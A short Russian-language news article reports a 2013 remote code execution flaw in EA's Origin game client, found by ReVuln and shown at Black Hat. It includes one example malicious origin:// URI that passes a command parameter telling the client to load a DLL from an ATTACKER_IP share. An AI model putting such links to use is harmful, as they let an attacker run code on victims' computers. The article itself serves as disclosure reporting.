Удалённое исполнение кода через платформу EA Origin

22.03.2013 | 10:43
Удалённое исполнение кода через платформу EA Origin
Более 40 миллионов пользователей рискуют стать жертвами новой уязвимости в онлайновой игровой платформе Origin компании Electronic Arts. На конференции Black Hat был показан эксплойт для Origin. Он позволяет исполнять посторонний код на компьютере пользователя. Сама клиентская программа Origin выполняет роль «троянского коня», который позволяет злоумышленнику проникнуть в систему.

Уязвимость обнаружили двое хакеров из компании ReVuln, которые уже неоднократно попадали в новости в связи с найденными багами в самых разных устройствах и приложениях: системах SCADA, телевизорах Samsung, игровой платформе Steam.

Уязвимость в Origin похожа на вышеупомянутую уязвимость в протоколе Steam. Она связана с некорректной обработкой Origin URI. Это позволяет злоумышленнику составить такой URI, который приведёт к удалённому исполнению кода на компьютере локального пользователя. Например, для активации игры в протоколе используются ссылки вроде origin://LaunchGame/71503, но при этом можно передавать ссылки такого вида: origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, так что жертва подгрузит с сервера злоумышленника на исполнение вредоносную библиотеку.

Описание бага см. в докладе (pdf), который авторы опубликовали перед конференцией. Есть также демонстрация на видео.
Удалённое исполнение кода, платформа, EA Origin
По материалам xakep.ru
Лента новостей: FacebookLiveJournalЯндекс

Комментарии (0)
Оставьте комментарий:CaptchaОбновить проверочный код